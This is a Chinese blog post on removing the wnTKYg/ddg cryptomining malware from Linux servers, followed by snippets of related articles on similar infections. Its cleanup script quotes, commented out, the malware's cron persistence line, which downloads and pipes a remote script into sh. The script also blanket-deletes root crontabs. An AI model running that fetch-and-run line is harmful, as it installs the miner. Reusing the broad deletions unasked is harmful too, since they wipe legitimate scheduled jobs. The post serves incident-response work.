近期 wnTKYg Linux 恶意软件简介

最新推荐文章于 2020-09-20 23:21:19 发布
最新推荐文章于 2020-09-20 23:21:19 发布
阅读量484 收藏
点赞数
文章标签: 恶意软件 http服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iodoo/article/details/78628564
版权

源头 : /tmp/ddg.2020


1.下载配置数据库,用来攻击其他电脑;
2.从配置中获取http服务器,下载i.sh的脚本;
3.将脚本插入到系统的cron中,定时执行;
4.执行脚本,将挖矿程序下载到本地,开始挖矿;

根据以上流程,可以从各个点来切断传播;

1. 切断第一步,让其无法获取配置文件,程序会先获取自身所在电脑的公网IP,

当获取不到公网IP之后,就没有然后了。。。以下从几个域名中可获取公网IP:

ident.me
v4.ident.me
ipinfo.io
ipecho.net
ipv4.icanhazip.com
ifconfig.co

在linux上 加入到 /etc/hosts

127.0.0.1  v4.ident.me

127.0.0.1  ipinfo.io
127.0.0.1  ipecho.net
127.0.0.1  ipv4.icanhazip.com
127.0.0.1  ifconfig.co

2.切断第三步,让其无法自动执行

删除该路径下面的所有文件 /var/spool/cron 

3.切断第四步,删除所有恶意程序

删除 /tmp/ddg.2020 /tmp/wnTKYg




必须要立马修改密码, 清除脚本

#!/bin/sh
#ver 1.1
chmod -x /tmp/ddg.2020 /tmp/wnTKYg
killall ddg.2020 wnTKYg
echo "as" > /tmp/ddg.2020
echo "as" > /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill

rm -rf  /var/spool/cron/root

rm -rf  /var/spool/cron/crontabs/root

#echo "* * * * * wget -q -O- http://10.0.22.61:9443/i.sh | sh" >> /var/spool/cron/crontabs/root

killall ddg.2020 wnTKYg

rm -rf /tmp/ddg.2020
rm -rf /tmp/wnTKYg
killall ddg.2020 wnTKYg
ps auxf | grep -v grep | grep ddg. | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep wnTKYg | awk '{print $2}' | xargs kill


=勿转载~~
i0dooo
关注
Linux 服务器感染kerberods 病毒
qq_40907977的博客
05-07 810
作者:他二哥 链接:https://www.cnblogs.com/kobexffx/p/11000337.html 症状及表现 1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。 注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox。 2、crontab 定时任务异常,存在...
Linux系统发现新恶意软件
06-26 441
安全研究人员发现了一种新的Linux恶意软件,它似乎是由中国黑客创建的,并被用作远程控制受感染系统的手段。 这个恶意软件命名为HiddenWasp,由用户模式rootkit,木马和初始部署脚本组成。该恶意软件与另一个最近发现的Linux恶意软件应...
挖矿进程wnTKYg解决方案
weixin_34403693的博客
11-12 146
  阿里云推送了一段短信:您的服务器出现了入侵事件:挖矿进程。赶紧top一下      CPU占用率99%,好气哦   pkill wnTKYg 先杀死再说   几秒后又出现了,肯定有自动执行脚本   crontab -l 果然有两个(此处没有截图),立马删掉 /var/spool/cron/ 下的所有文件,   还是出现了wnTKYg,重复几次以上的操作,发现。。。麻辣鸡,ddg.1...
wnTKYg长期占用CPU资源(linux
baidu_36720706的博客
03-19 270
第一步:堵住木马入侵的源头由于一开始使用redis并没有设置密码,导致wnTKYg被植入。修补该漏洞的方法(在redis.conf中设置):①.修改默认端口# Accept connections on the specified port, default is 6379 (IANA #815344). # If port 0 is specified Redis will not listen...
minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%
sylalak123的博客
01-08 496
今天登录服务器感觉服务器特别的慢。结果查看发现有两个进程占用CPU100%了,一个是minerd一个是wnTKYg。如果大家遇到请小心。 查看服务器各个程序占用资源量 [root@iZ2zeayj54m6qs0689jm ~]# top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND ...
阿里云CentOS7.2清除wnTKYg木马
木头若愚
11-07 1848
最近发现阿里云CPU占用很高,一直是100%,重启之后降下来了,但过一会又100%。 用top命令查了一下,发现是wnTKYG进程占用了99.9%,百度了一下wnTKYG说是一个挖矿木马,中毒原因应该是redis没有设密码或者是弱口令。 先关了redis防止再次中招 systemctl stop redis_6379 接下来 如果/root/.ssh/下有异常文件或记录:rm -
CentOS7清除wnTKYg木马
紫眸的博客
06-11 6670
今天偶然发现服务器cpu占用率一直是100%,top查看了发现是一个名为wnTKYg的进程。 网上查找说是一个挖矿木马,清理之后做个记录。 木马如下图: 尝试pkill -9 wnTKYg杀死进程,发现没过多久又出现了 感觉好恶心,中毒原因应该是redis没有设密码或者是弱口令,先关了redis防止再次中招 systemctl stop redis 接下来 如果/root/.
分析teamTNT团队Linux挖矿木马执行过程与防范
欢迎访问胡宝全的博客
09-20 1564
分析teamTNT团队Linux挖矿木马执行过程与防范 公司需要扩展海外业务,需要有一台海外云服务器。当我们把应用部署上去时的第二天所有应用down掉了,然后发现ssh连接服务器特别慢。好不容易连接上了执行一下free -h 发现内存占用99%,反手一个top,等了大约2分钟出来结果。 问题排查 查看当前内存:free -h 发现内存占用几乎达到98%。 查看当前进程:top等了大约2分钟出来结果。竟然有7000多个tasks,load average: 459.78, 584.52, 387.07,这明
记录linux zigw挖矿病毒查杀
guanzhengyinqin的博客
01-27 1382
关于此病毒的参考文献: https://4hou.win/wordpress/?spm=a2c4e.11153940.blogcont657476.14.53ff2757GtnJxj&cat=6270 病毒介绍 https://yq.aliyun.com/articles/657476 病毒清理,不过有时会复发 https://blog.csdn.net/sayWhat_sayHello/...
太恐怖了,我的Linux服务器感染了kerberods病毒...
Xn346的博客
04-17 784
一、症状及表现 1、CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发现CPU被大量占用。 注:ls top ps等命令已经被病毒的动态链接库劫持,无法正常使用,大家需要下载busybox。 2、crontab 定时任务异常,存在以下内容; 3、后期病毒变异,劫持sshd,导致远程登陆失败,偶尔还会跳出定时任务失败,收到新邮件等问题 4、 存在异常...
服务器被挂马wnTKYg挖矿的清理
追梦的博客
05-15 314
locate wnTKYg命令一上屏,遂将这个程序位置暴露出来,竟然在/tmp下。百度查了查据说这个是redis允许远程连接并且没设密码的关系,正好符合我们新项目测试的环境,赶紧打开/etc/redis.conf文件 把bind 127.0.0.1的注释del掉了,重启redis。测试从外部机器上登录redis已经登不上了。接下来改着手干掉这个进程了,二话不说直接kill -9掉这个进程,cd到/...
wnTKYg木马的解决
qq877192055的博客
09-29 487
tomcat 无缘无故卡死,查询cpu发现cpu一直很高 top命令,发现异常进程wnTKYg 1.cd /tmp 删除所有ddg开头的文件和wnTKYg文件 2.kill掉ddg开头的进程和wnTKYg进程 3.、/var/spool/cron 下面删除文件 再监控10分钟,发现cpu正常了
服务器挖矿又出新服务 wnTKYg
热门推荐
my8611051316的专栏
03-06 1万+
wnTKYg同minerd和AnXqV两个一样都是挖矿程序。 一台服务器安装的redis3.2.8(6379端口)的版本,今天发现还是被挖矿,这次和之前的不同服务器的CPU资源没被耗到98%,而是一直维持在70%。同IP端内的另一台服务器redis3.2.8(6000端口)的机器目前没有被挖矿,继续监控中。 临时解决方法跟之前一样。 1、关闭访问挖矿服务器的访问:iptables -I
清除wnTKYg 这个挖矿工木马的过程讲述
u010789532的博客
04-23 9294
由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了。感慨一番,书归正传,下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率300%, 这个挖矿工木马的过程讲述" title="清除wnTKYg 这个挖矿工木马的过程讲述" style
Java调用Jenkins API获取任务构建归档文件
建伟博客
03-14 4353
Centos 清除wnTKYg 删除挖矿病毒 redis漏洞
基于大模型技术的算力产业监测服务平台设计
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot.zip
最新发布
09-17
This_honeypot_supports_Telnet_and_SSH_two_protocol_FF-Pot
吉他谱_What I've Done - Linkin Park.pdf
09-17
初级入门吉他谱 guitar tab
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值